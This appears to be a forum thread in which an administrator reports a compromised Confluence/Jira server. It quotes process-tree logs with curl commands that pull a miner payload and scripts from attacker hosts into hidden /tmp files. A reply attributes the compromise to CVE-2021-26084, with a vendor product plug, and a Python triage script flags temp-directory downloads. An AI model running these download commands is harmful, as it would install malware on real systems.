Hello. How can I check the safety of my Jira server?
Today the server went offline. When I restarted the server I found a strange file, hackdwl, with code in the /tmp dir; please see:
CURL: -fsSL http://[redactedAddress1]:8080/docs/s/config.json -o /tmp/.solr/config.json
PPID=19939
bash,19939,confluence /tmp/.java
`-bash,20436 /tmp/.java
`-pstree,20438 -l -p -c -a -u 19939
-----------------------------
CURL: -fsSL http://[redactedAddress2]:2143/auth/solrd.exe -o /tmp/.solr/solrd
PPID=19939
bash,19939,confluence /tmp/.java
`-bash,20442 /tmp/.java
`-pstree,20443 -l -p -c -a -u 19939
-----------------------------
CURL: -fsSL http://[redactedAddress1]:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
PPID=19939
bash,19939,confluence /tmp/.java
`-bash,20453 /tmp/.java
`-pstree,20454 -l -p -c -a -u 19939
-----------------------------
CURL: -fsSL http://[redactedAddress1]:8080/docs/s/asd.txt -o /tmp/.solrx
PPID=1879
java,1879,confluence -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties-Djava.uti
|-bash,23156 -c curl\040-fsSL\040http://[redactedAddress1]:8080/docs/s/asd.txt\040-o\040/tmp/.solrx
| `-pstree,23163 -l -p -c -a -u 1879
|-java,2304 -classpath/opt/atlassian/confluence/temp/synchrony-standalone6213138649977042231.jar:/opt/at
| |-{java},2305
| |-{java},2308
| |-{java},2309
| |-{java},2310
| |-{java},2311
| |-{java},2313
| |-{java},2314
| |-{java},2315
| |-{java},2316
| |-{java},2317
| |-{java},2319
.....
Also I found 2 new files, liblz4-java.....so and libnetty-transport....so, in the /tmp dir.
What do I need to do?
Just FYI, you have been exploited with CVE-2021-26084. You have a crypto miner running at the least. You should build out a new server. Also, my customers are safe from this due to the fact they run Check Point Harmony Endpoint EDR. Whatever endpoint protection you are running is not working.
~Keith,
ksmith@rmsource.com
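A triage check for the kind of process-tree evidence pasted in the question, added here as an example and not code from either poster: it parses pstree -l -p -c -a -u style output (a constructed sample modelled on the question's lines, reusing the page's redacted address placeholder) and flags processes that run, fetch or hide files under world-writable temp directories, which is exactly what the confluence-owned bash /tmp/.java and curl ... -o /tmp/.solrx entries show.

```python
import re

# Constructed sample modelled on the pstree -l -p -c -a -u output quoted in the question
# (the address placeholder is the one used on the page, not a real host).
SAMPLE_PSTREE = r"""java,1879,confluence -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties
  |-bash,23156 -c curl\040-fsSL\040http://[redactedAddress1]:8080/docs/s/asd.txt\040-o\040/tmp/.solrx
  |-java,2304 -classpath /opt/atlassian/confluence/temp/synchrony-standalone.jar
  | |-{java},2305
bash,19939,confluence /tmp/.java
  `-bash,20436 /tmp/.java
cron,812,root -f
"""

# One pstree line: tree glyphs, then name,pid[,user] and the argument string.
PROC_RE = re.compile(r"^[\s|`\-]*([A-Za-z0-9_.{}-]+),(\d+)(?:,([A-Za-z0-9_-]+))?\s*(.*)$")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
INTERPRETERS = ("bash", "sh", "dash", "python", "perl")

def parse_pstree(text):
    """Turn pstree text into a list of {name, pid, user, args} dicts (user is None if inherited)."""
    procs = []
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if not m:
            continue
        name, pid, user, args = m.groups()
        # pstree prints a space inside an argument as the octal escape \040
        procs.append({"name": name, "pid": int(pid), "user": user,
                      "args": args.replace("\\040", " ")})
    return procs

def find_indicators(procs):
    """Flag processes whose arguments point at files under a world-writable temp dir."""
    findings = []
    for p in procs:
        temp_paths = [t for t in p["args"].split() if t.startswith(TEMP_DIRS)]
        if not temp_paths:
            continue
        reasons = []
        if DOWNLOADER_RE.search(p["args"]):
            reasons.append("downloader writing into temp dir")
        if any(t.rsplit("/", 1)[-1].startswith(".") for t in temp_paths):
            reasons.append("hidden file in temp dir")
        if p["name"] in INTERPRETERS:
            reasons.append("interpreter launched with temp-dir path")
        findings.append({"pid": p["pid"], "name": p["name"], "user": p["user"],
                         "paths": temp_paths, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_indicators(parse_pstree(SAMPLE_PSTREE)):
        print(f"pid {f['pid']} ({f['name']}): {', '.join(f['reasons'])} -> {f['paths']}")
```

On a live host, feed it the output of `pstree -l -p -c -a -u` for the service account; the legitimate Confluence java and synchrony processes in the sample stay unflagged because their paths live under /opt/atlassian, not /tmp.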